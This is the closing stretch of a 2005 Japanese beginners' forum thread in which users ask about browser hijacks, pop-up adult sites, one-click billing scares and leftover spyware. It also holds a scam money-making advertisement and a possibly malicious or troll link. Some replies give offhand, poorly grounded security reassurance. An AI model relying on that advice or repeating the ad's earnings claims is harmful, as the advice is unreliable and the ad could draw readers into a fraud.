http://www.brainwars.co.jp/deep/cgi/pdeep.cgi?m=OB&n=UpUp
?U¨?A°

HP http://www.brainwars.co.jp/deep/
E-mail deep@brainwars.co.jp


984 :ひよこ名無しさん:05/03/04 02:56:02 ID:zTLZq8mm
助けてください。先ほどアダルトサイトを見て回っていたところ、
なぜかいきなり英語ばかりのアダルトサイトに飛ばされました。
しかも、ウィンドウをとじるボタンがなくなりどんどん
画像がひらきまくりました。怖くなったのでパソ自体の電源
を切って今の状態に至るのですが、このあとにへんな
請求が来たりする可能性はあるんでしょうか?
回線はADSLです。どうかよろしくお願いします。

985 :ぼるじょあ ◆yBEncckFOU :05/03/04 03:26:04 ID:???
ADSLなら大丈夫だと思う

986 :ひよこ名無しさん:05/03/04 03:31:21 ID:???
ttp://ocnsearch.goo.ne.jp/click.jsp?DEST=http://www.gorogoro.com/jk/&no=40
ここいったらIP抜かれた・・・48000円だとよ・・・

987 :ひよこ名無しさん:05/03/04 03:33:08 ID:???
>>979
セーフモードで赤いやつFixしてみた?

988 :ひよこ名無しさん:05/03/04 03:46:21 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

989 :979:05/03/04 04:21:37 ID:YvkymXRM
>>987
なおりました!
どうもありがとうございました

990 :ひよこ名無しさん:05/03/04 04:31:24 ID:???
>>989
うむ。

991 :ひよこ名無しさん:05/03/04 05:08:02 ID:9DskiBGB
すみません。スタートページが他のサイトに書き換えられる件で、
テンプレに書いてあった、システムの復元で1週間前に戻したら
直ったのですが、
一度スパイウエア?取り込んでしまった以上は、
パソコンの中に残っているのでしょうか??
見つけて削除しない限りは残ったまんまなのでしょうか?
それとも、もう大丈夫なのでしょうか??
教えてください。

992 :ひよこ名無しさん:05/03/04 05:25:04 ID:???
>>991
残っていますが、隔離状態なので心配ないです。

993 :991:05/03/04 06:46:52 ID:???
>>992
返事ありがとうございます。安心しました。

994 :ひよこ名無しさん:05/03/04 10:34:45 ID:???
>>1-993に書かれている事を態々やらなくても、
システムの復元で直るから良いんじゃないの?

995 :ひよこ名無しさん:05/03/04 11:25:35 ID:???
そうだね!復元さえ使えばきんたまでもぬるぽでも全部直るよ!

996 :ひよこ名無しさん:05/03/04 12:41:48 ID:???
もうちょっとです。

997 :984です:05/03/04 12:57:12 ID:zTLZq8mm
985ぼるじょあさんお返事ありがとうございました。
1つ質問したいのですが、ダイヤルQ2接続っていう
のはADSLの場合は心配しなくていいのでしょうか?
ここに書き込んだあとにspybotとウイルススキャンと
ダイヤルQ2接続チェックプログラムを使ってみたと
ころ、スパイウイルスが3個見つかっただけです。
ダイヤルQ2接続チェックプログラムの使い方に書い
てあったのですが、ダイヤルQ2に巧妙につながるよ
うになっていれば見つからない可能性がありますと
ありましたが、大丈夫なのでしょうか?
どなたかお返事よろしくお願いします。

998 :hiro:05/03/04 13:09:16 ID:ORqVfiNB

このように宣伝するだけでいいのです!
2900円(1回きり!)いりますが私は4日後には倍になりました(^−^)
1ヶ月、空いた時間(30分)でちょこっとやって
はじめのお給料で6万くらいになりました!
1日2時間くらいできる方なら日給6900円も見込めます。
現にそれ以上稼いでる人はたくさんいますよ。
損はないと思います。
登録したらすぐに詳細がきますので
簡単にはじめられます♪
ねずみ講などでは御座いませんのでご心配なく(、^−^)v
本当に安心ですから今日から
お小遣い程度、稼いでみませんか☆
http://ni-no3.hp.infoseek.co.jp/



999 :ひよこ名無しさん:05/03/04 13:40:45 ID:Ps/BLDsn
dsaf


1000 :ひよこ名無しさん:05/03/04 13:47:08 ID:???
1000000000000000000000000000000000000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

310 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)